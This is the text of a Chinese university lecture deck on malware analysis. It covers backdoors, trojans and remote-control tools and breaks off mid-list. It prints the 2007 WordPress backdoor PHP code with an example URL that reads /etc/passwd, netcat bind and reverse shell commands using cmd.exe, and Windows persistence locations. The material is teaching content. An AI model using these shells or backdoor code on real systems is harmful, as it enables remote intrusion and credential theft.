后门木马rootblek基本用法和防御.pptVIP

恶意软件的分析与防范 严 飞 武汉大学计算机学院 yanfeiclass@126.com 课时安排 恶意代码概述 计算机病毒 网络蠕虫 网页/移动恶意代码 后门、木马和Rootkit 常用检测技术和工具 课堂讨论与练习 期末考试 后门 后门是一个允许攻击者绕过系统中常规安全控制机制的程序，他按照攻击者自己的意图提供通道。 后门的重点在于为攻击者提供进入目标计算机的通道。 后门类型——从功能上分类 系统级后门：在系统层能访问数据和进程 应用级后门：逃逸安全机制的合法程序 密码级后门：能够以某种方式看懂密文 后门类型——从控制方法分类 本地权限的提升 对系统有访问权的攻击者变换其权限等级成为管理员，然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。 单个命令的远程执行 攻击者可以向目标计算机发送消息。每次执行一个单独的命令，后门执行攻击者的命令并将输出返回给攻击者。 远程命令行解释器访问 如远程Shell，这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。 远程控制GUI 攻击者可以看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都通过网络实现。 后门的安装 自己植入（物理接触或入侵之后） 漏洞 病毒 蠕虫 恶意移动代码 社会工程（欺骗受害者自己安装） Email 远程共享 BT下载 …… Example 2001年，Borland的数据库软件Interbase 发现隐藏了七年的后门，程序中包含一个万能密码和用户名： 用户名是“politically” 密码是“correct” 用户包括波音、诺基亚、摩托罗拉和波士顿股票交易所、Sun等 Example 2007年， Wordpress 2.1.1远程命令执行后门漏洞 黑客攻击了WordPress的下载网站，修改了代码如下 在wp-includes/theme.php文件中： function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET[iz]) { get_theme_mcommand($_GET[iz]); } passthru()会执行通过iz变量传入的PHP代码。 如攻击：http://wordpressurl/wp-includes/theme.php? iz =cat/etc/passwd 后门连接工具 NetCat：通用的网络连接工具 用法一： nc –l –p 5000 –e cmd.exe nc 5000 用法二： nc –l –p 5000 nc 5000 –e cmd.exe cshell.exe 其他Windows下的后门程序 CryptCat Tini 提供通向Tcp端口7777，只有3K。 …… 曾经的一个优秀网站…… 无端口后门-如何唤醒 ICMP后门 不使用TCP/UDP协议。 使用ICMP协议进行通信。 难以检测。 非混合型探测后门攻击者将触发指令发送到对方计算机。 难以检测。(Cd00r: syn to port x, syn to port y, syn to port z) 混合型探测后门 只要攻击者将触发指令发送到对方网络中即可触发后门。 更加难以检测。 (syn to port x , syn to port x, syn to port x in different Ips) 反弹式木马 GUI(Graphics User Interface)远程控制 灰鸽子 并非所有的GUI远程控制都是恶意的 VNC(Virtual Network Computing) Windows Terminal Services PCAnywhere Back Orifice 2000 VNC 英国剑桥大学ATT实验室在2002年开发的轻量型的远程控制计算机软件，任何人都可免费取得该软件。 VNC软件主要由两个部分组成： VNC server及VNC viewer。 VNC server 与 VNC viewer 支持多种操作系统，如 windows，Linux，MacOS 及 Unix 系列（Unix，Solaris等），因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。 也可以通过一般的网络浏览器（如 IE 等）来控制被控端（需要 Java 虚拟机的支持）。 后门的启动 感染普通执行文件或系统文件 添加程序到“开始”-“程序”-“启动”选项 修改系统配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相关启动选项 通过修改注册表启动键值 修改文件关联的打开方